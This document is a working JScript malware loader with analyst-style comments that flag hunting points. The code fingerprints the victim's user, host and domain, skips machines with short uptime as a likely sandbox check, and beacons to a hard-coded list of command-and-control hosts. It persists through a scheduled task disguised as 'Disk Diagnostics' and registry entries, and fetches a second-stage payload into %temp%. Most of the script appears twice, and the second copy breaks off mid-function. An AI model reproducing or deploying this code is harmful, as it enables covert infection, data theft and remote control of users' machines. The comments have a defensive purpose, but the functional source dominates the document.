- // lack it; required by DataTools.Hash. Overrides the native implementation if present.
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- // Host artifacts worth hunting for. All registry values are written under REG_ROOT
- // (HKCU, so no elevation is needed). Persistence is a scheduled task named TASK_NAME
- // that runs PERSIST_COMMAND (explorer.exe launching a .js from C:\Users\Public) every
- // %timeout% minutes; NTFILE_PATH is a decoy/marker file. The %name%/%command%/%path%/
- // %args%/%time%/%timeout% placeholders are filled by DataTools.Strings.ParseTemplate.
- // WMIC_EXEC_ARGS, WMIC_EXEC, TASK_CREATE and ADS_SSID are defined but not referenced by
- // the code in this script.
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- // Indirection layer for COM object creation: ProgIDs are looked up by symbolic key and
- // instantiated through ActiveXObject. Only MAIN_SH_OBJECT, FS_DRIVE_OBJECT and
- // HTTP_CLIENT_OBJECT are requested through it; the ADODB/MSXML objects are created
- // directly in the Base64* helpers. Keeping ProgIDs away from call sites presumably serves
- // signature evasion (inference).
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- // Obfuscation and encoding helpers. None of this is cryptography.
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- // DeriveKey: XOR-folds every char code of keyStr into KEY_BASE, then returns the sum of
- // the decimal digits of the result. For ASCII input the XOR stays below 2048, so the
- // returned key is a small integer (at most 28): a single-byte XOR key that can simply be
- // brute-forced when decoding captured traffic, nonce or not.
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- // RotString: XOR of every char code of str with key (despite the name, not a rotation).
- // It is its own inverse, so the same call both encodes and decodes.
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- // Hash: 32-bit multiplicative hash (seed 0xdeadbeef, multiplier 2654435761, high half
- // folded in at the end) returned as lowercase hex. Depends on the Math.imul above.
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- // Random.Number / Random.String: Math.random-based (not a CSPRNG) integer in [min, max]
- // and a lowercase-letter string of length len; used only for URL noise and nonces.
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- // Strings.ParseTemplate: templateStr has the form "k=v&k=v"; every %k% placeholder in
- // str is replaced by v (first occurrence only, as String.replace with a string pattern).
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- // Thin wrappers over WScript.Shell, Scripting.FileSystemObject and WMI. Everything here
- // runs with the current user's rights only (HKCU writes, user-writable paths).
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- // Execute: WScript.Shell.Run of an arbitrary command line; Loader.Persist uses it to
- // run schtasks, so the script host spawning schtasks.exe is a detection opportunity.
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- // RegRead takes a full key path; RegWrite is relative to GlobalStrings.REG_ROOT (HKCU).
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- // CreateFile: creates/overwrites path with one line of 1024 random letters (decoy content).
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- // AppendDataStream / AppendDataStreamB / WriteDataStreamBytes write to an NTFS alternate
- // data stream ("path:stream"). None of them is called by the code visible in this script,
- // but their presence suggests ADS hiding is used elsewhere in the toolset (inference).
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- // WriteData overwrites a text file; WriteBytes saves an ADODB.Stream (mode 2 = overwrite).
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- // GetWMIProvider: winmgmts moniker with impersonation; only ever called with "." (local).
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- // GetUptime: SystemUpTime in seconds from Win32_PerfFormattedData_PerfOS_System; 0 on
- // any error. Feeds the uptime gate in Loader.DeployClient.
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- // GetArch: NOT a real architecture check. Returns "32" only when ProductName contains
- // "Windows 7", otherwise "64". The value is sent to the C2 as "rtag".
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- // Single shared MSXML2.XMLHTTP instance doing synchronous GETs. Returns the response
- // body on HTTP 200 and "" on any other status or exception, so callers cannot tell a
- // failed request from an empty reply. All C2 traffic is plain http:// per config.
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- // Victim fingerprint collected at load time from environment variables and WMI.
- // MachineType is "true" when COMPUTERNAME differs from USERDOMAIN, i.e. the host is
- // probably domain-joined (workgroup machines report their own name as USERDOMAIN).
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- // GetUid: per-victim ID = Hash(username+pc+domain+machinetype+version+sig) + version.
- // Deterministic, so the same user on the same host always gets the same ID; it is also
- // the key material for decoding C2 replies and the name of the dropped %temp% file.
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- // GetInitialRequest: colon-joined fingerprint, XOR-obfuscated with a key derived from
- // nonce + C2_OB_KEY, then base64 and URL-encoded. The nonce is sent in the same URL
- // (ubwG=), so the whole check-in is decodable from a proxy log with the static key.
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- // GetInitialEndpoint: check-in path under C2_PREFIX with decoy parameters (client=,
- // service_id=). NOTE(review): "®clid" is presumably an HTML-entity rendering artifact
- // of "&regclid" on this paste -- confirm against a live sample before writing rules.
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- // DeployHost: fetches a second payload from SELECTED_C2 (/go.aspx, rtag = GetArch()),
- // XOR-decodes it with DeriveKey(uid + C2_OB_KEY), base64-decodes it and writes the bytes
- // to %temp%\<uid>.bin. Returns that path; nothing in this script executes the file.
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- // DeployClient: main check-in loop. Exits silently when system uptime <= 3000 s
- // (~50 min), which looks like a sandbox/analysis-VM check (inference). Then tries every
- // PRIMARY_C2 host for up to C2_FAIL_COUNT rounds, sleeping C2_REQUEST_SLEEP s after each
- // attempt. A reply that, after XOR decoding, contains "<<<CLIENT__" is base64-decoded into
- // a script and handed to Persist; the answering host and the UID are stored in HKCU
- // (ShimV4, SetupServiceKey). Exceptions are swallowed; any other reply is just retried.
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- // Persist: (1) creates the "Disk Diagnostics" scheduled task that runs PERSIST_COMMAND
- // every 6 minutes; (2) stores the received script in the ServerUrl value and a copy of
- // THIS script (its own file) in WebLib32, both under HKCU; (3) drops the decoy
- // diskdiag.ini; (4) writes the received script to C:\Users\Public\Disk0.js; (5) pulls
- // the second payload via DeployHost. Hunting points: schtasks.exe spawned by the script
- // host, explorer.exe launching a .js from C:\Users\Public, and the REG_ROOT key.
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- // Developer leftover: shows a WScript.Shell popup. Not called anywhere in this script.
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- // Base64 -> bytes via the MSXML bin.Base64 dataType, then the bytes are re-read from an
- // ADODB.Stream as UTF-8 text. Used to turn the C2 reply into the second-stage script.
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- // Text -> raw ASCII bytes through an ADODB.Stream (write as text, re-read as binary).
- // Only used by Base64Encode; non-ASCII characters are subject to the "ascii" charset.
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- // Base64 -> an open binary ADODB.Stream holding the decoded bytes. The caller
- // (Windows.WriteBytes) is responsible for SaveToFile and Close.
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- // ASCII bytes of string -> base64 text via MSXML. Strips the newlines MSXML inserts and
- // ALSO every "//" sequence, which silently corrupts any encoding that contains one.
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- // Entry point. Runs the check-in only when CLIENT_IMPORT_ENV is undefined, i.e. when the
- // file is executed directly rather than eval'd by a host that defines that flag
- // (presumably the embedding loader that reads this script back from the registry -- TODO confirm).
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- // Loader configuration: PRIMARY_C2 = ordered host list tried by Loader.DeployClient;
- // SOFT_SIG / SOFT_VERSION = campaign and build tags (also part of the victim UID);
- // C2_OB_KEY = seed of the XOR key for all traffic; C2_PREFIX = check-in path; sleeps in
- // seconds. NOTE(review): C2_FAIL_SLEEP is never read by the code in this script.
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- // Active C2; starts as the first entry and is replaced by whichever host answers.
- var SELECTED_C2 = config.PRIMARY_C2[0];
- // Unconditional Math.imul (32-bit integer multiply) replacement for script hosts that
- // lack it; required by DataTools.Hash.
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- // Host artifacts: registry values under REG_ROOT (HKCU); scheduled task TASK_NAME running
- // PERSIST_COMMAND (explorer.exe launching a .js from C:\Users\Public); decoy NTFILE_PATH.
- // %...% placeholders are filled by DataTools.Strings.ParseTemplate. WMIC_EXEC_ARGS,
- // WMIC_EXEC, TASK_CREATE and ADS_SSID are not referenced by the code in this script.
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- // COM object factory: ProgIDs looked up by symbolic key and instantiated via ActiveXObject.
- // Only MAIN_SH_OBJECT, FS_DRIVE_OBJECT and HTTP_CLIENT_OBJECT go through it; the
- // ADODB/MSXML objects are created directly in the Base64* helpers.
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- // Obfuscation and encoding helpers; none of this is cryptography.
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- // DeriveKey: XOR-fold of keyStr into KEY_BASE, then digit sum of the result. For ASCII
- // input the key is at most 28 -- a single-byte XOR key, trivially brute-forceable.
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- // RotString: per-character XOR with key (not a rotation); self-inverse.
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- // Hash: 32-bit multiplicative hash (seed 0xdeadbeef, multiplier 2654435761) as lowercase hex.
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- // Random.Number / Random.String: Math.random-based integer in [min, max] and lowercase
- // string of length len; used for URL noise and nonces only.
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- // Strings.ParseTemplate: "k=v&k=v" -> replaces the first %k% in str with v for each pair.
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- // Wrappers over WScript.Shell, Scripting.FileSystemObject and WMI (current-user rights only).
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- // Execute: WScript.Shell.Run; used by Loader.Persist to run schtasks.
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- // RegRead takes a full path; RegWrite is relative to GlobalStrings.REG_ROOT (HKCU).
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- // CreateFile: overwrites path with one line of 1024 random letters (decoy content).
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- // The three *DataStream* helpers write to an NTFS alternate data stream ("path:stream");
- // none is called by the code in this script.
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- // GetWMIProvider: winmgmts moniker with impersonation; only called with "." (local host).
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- // GetUptime: SystemUpTime (seconds) from Win32_PerfFormattedData_PerfOS_System; 0 on error.
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- // GetArch: not a real architecture check -- "32" only when ProductName contains "Windows 7".
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- // Synchronous GET over one shared MSXML2.XMLHTTP; "" on non-200 status or exception.
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- // Victim fingerprint from environment variables and WMI; MachineType is "true" when
- // COMPUTERNAME differs from USERDOMAIN (probably domain-joined).
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- // GetUid: deterministic per-victim ID = Hash(fingerprint + version + sig) + version.
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- // GetInitialRequest: colon-joined fingerprint, XOR with DeriveKey(nonce + C2_OB_KEY),
- // base64, URL-encoded. The nonce is sent in the same URL, so the check-in is decodable.
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- // GetInitialEndpoint: check-in path. NOTE(review): "®clid" is presumably an HTML-entity
- // rendering artifact of "&regclid" on this paste -- TODO confirm on a live sample.
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- // DeployHost: fetches /go.aspx from SELECTED_C2, XOR-decodes with DeriveKey(uid +
- // C2_OB_KEY), base64-decodes and writes %temp%\<uid>.bin; returns the path, does not run it.
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- // DeployClient: quits when uptime <= 3000 s (likely sandbox check); otherwise polls each
- // PRIMARY_C2 host for C2_FAIL_COUNT rounds, C2_REQUEST_SLEEP s apart. A decoded reply
- // containing "<<<CLIENT__" is base64-decoded to a script and handed to Persist; the
- // answering host and UID are written to HKCU (ShimV4, SetupServiceKey). Errors are swallowed.
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- // Persist: "Disk Diagnostics" scheduled task every 6 min; received script stored in
- // ServerUrl and this script's own file in WebLib32 (HKCU); decoy diskdiag.ini; received
- // script written to C:\Users\Public\Disk0.js; then DeployHost. Hunt for schtasks.exe
- // spawned by the script host and explorer.exe launching a .js from C:\Users\Public.
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
